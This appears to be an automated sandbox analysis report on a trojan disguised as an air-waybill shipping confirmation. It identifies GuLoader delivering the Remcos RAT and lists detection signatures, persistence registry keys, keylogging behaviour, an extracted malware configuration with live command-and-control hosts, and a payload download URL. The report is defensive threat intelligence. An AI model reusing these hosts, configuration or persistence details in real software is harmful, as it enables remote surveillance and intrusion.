Edit tour

Windows Analysis Report
Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Overview

General Information

Sample name:	Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
Analysis ID:	1592408
MD5:	dd009056ed546d7cb3b75ef74f748ced
SHA1:	39fa6f07ceaf1d545c02702a18dcacc5c57acf0a
SHA256:	bfe72721ad2c670966f0d1a30af60b5d697731c31afdd028ee316d32ab2e4e17
Tags:	batexeuser-abuse_ch
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Yara detected GuLoader

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Installs a global keyboard hook

Sigma detected: New RUN Key Pointing to Suspicious Folder

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sigma detected: CurrentVersion Autorun Keys Modification

Sleep loop found (likely to delay execution)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe" MD5: DD009056ED546D7CB3B75EF74F748CED)

Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe (PID: 7700 cmdline: "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe" MD5: DD009056ED546D7CB3B75EF74F748CED)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\ProgramData\remcos\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\eftermodnendes\ringeagt\Garantis131.Sul	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
C:\Users\user\AppData\Local\Temp\nsc44DF.tmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2125848795.00000000030D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000004.00000002.2983718490.0000000001660000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000000.00000002.2125582739.00000000028CB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000000.00000002.2125848795.000000000316C000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000004.00000002.2983718490.00000000016FC000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe PID: 7700	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, ProcessId: 7700, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Snecks

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, ProcessId: 7700, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Snecks

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, ProcessId: 7700, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T05:10:54.309320+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49737	109.99.162.14	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat

ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Virustotal: Detection: 29%			Perma Link
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	ReversingLabs: Detection: 60%

Yara detected Remcos RAT

Source: Yara match	File source: 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: mshtml.pdbUGP source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmp

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Code function: 0_2_004069DF FindFirstFileW,FindClose,	0_2_004069DF
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Code function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D8E
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: linktreewealth.zapto.org
Source: Malware configuration extractor	URLs: linktreewealth.zapto.org
Source: Malware configuration extractor	URLs: linktreewealthy.zapto.org

Source: Joe Sandbox View

IP Address: 109.99.162.14 109.99.162.14

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 109.99.162.14:443

Source: global traffic

HTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: teldrum.ro
Source: global traffic	DNS traffic detected: DNS query: linktreewealth.zapto.org
Source: global traffic	DNS traffic detected: DNS query: linktreewealthy.zapto.org

Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, Halvdelene.bat.4.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2990368035.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin0x
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binA
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2990368035.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binHipssFricrestereamuschilor.ro/NJrdZqNcCtz102.bin
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binL

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown

HTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.4:49737 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Jump to behavior

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Code function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405846

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Code function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403645

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Code function: 0_2_00406DA0		0_2_00406DA0
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Code function: 0_2_733B1BFF		0_2_733B1BFF

Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/10@3/1

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

0_2_00403645

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Code function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404AF2

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Code function: 0_2_004021AF CoCreateInstance,

0_2_004021AF

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

File created: C:\Users\user\eftermodnendes

Jump to behavior

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Mutant created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIG

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

File created: C:\Users\user\AppData\Local\Temp\nsc44DE.tmp

Jump to behavior

Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Virustotal: Detection: 29%
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

File read: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Process created: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Process created: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: ncrypt.dll	Jump to behavior
